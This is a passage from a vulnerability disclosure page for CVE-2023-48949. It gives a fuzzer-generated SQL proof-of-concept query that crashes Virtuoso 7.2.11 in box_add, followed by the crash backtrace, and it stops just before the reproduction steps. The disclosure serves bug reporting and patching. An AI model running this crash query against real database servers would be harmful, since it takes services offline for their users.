Headline

CVE-2023-48949: Fuzzer: Virtuoso 7.2.11 crashed at box_add · Issue #1173 · openlink/virtuoso-opensource

An issue in the box_add function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

11 months ago

CVE

Open in Source

#sql #dos #docker

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 FLOAT UNIQUE , v2 INT ) ; INSERT INTO v0 VALUES ( NULL , 57 ) ; INSERT INTO v0 VALUES ( -1 , ( SELECT 60 , v2 FROM v0 WHERE v2 = -1 ) ) ; UPDATE v0 SET v1 = ( CASE WHEN v2 * v1 THEN 76 ELSE ( SELECT v2 FROM v0 WHERE v1 = -2147483648 / CASE WHEN v2 = ( SELECT v1 FROM v0 WHERE ( CASE WHEN v2 = v2 AND v2 = v2 AND v2 THEN v2 + v1 * -128 + 48100742.000000 END ) IN ( SELECT v1 FROM v0 WHERE v2 BETWEEN ‘x’ AND ‘x’ OR ( CASE WHEN v2 = 16 THEN 46 ELSE v1 + ( 69175744.000000 , 10962973.000000 ) / 36 + 5 END ) GROUP BY ‘x’ ) ORDER BY v2 / 45 DESC ) THEN 32232158.000000 END ) END ) ;

backtrace:

#0 0xc1e333 (box_add+0x83) #1 0x75e0ba (code_vec_run_no_catch+0xe5a) #2 0x8966e5 (itc_vec_row_check+0x8e5) #3 0x617353 (itc_page_search+0xc13) #4 0x61345f (itc_search+0x84f) #5 0x896de4 (itc_vec_next+0x364) #6 0x7b2565 (ks_start_search+0xf75) #7 0x7b434e (table_source_input+0x99e) #8 0x7af05e (qn_input+0x3ce) #9 0x44c979 (chash_fill_input+0x589) #10 0x5370af (hash_fill_node_input+0xef) #11 0x7af05e (qn_input+0x3ce) #12 0x7af4c6 (qn_send_output+0x236) #13 0x8214bd (set_ctr_vec_input+0x99d) #14 0x7af05e (qn_input+0x3ce) #15 0x7c1be9 (qr_dml_array_exec+0x839) #16 0x7ce602 (sf_sql_execute+0x15d2) #17 0x7cecde (sf_sql_execute_w+0x17e) #18 0x7d799d (sf_sql_execute_wrapper+0x3d) #19 0xe214bc (future_wrapper+0x3fc) #20 0xe28dbe (_thread_boot+0x11e) #21 0x7f7e10239609 (start_thread+0xd9) #22 0x7f7e10009133 (clone+0x43)

ways to reproduce (write poc to the file /tmp/test.sql first):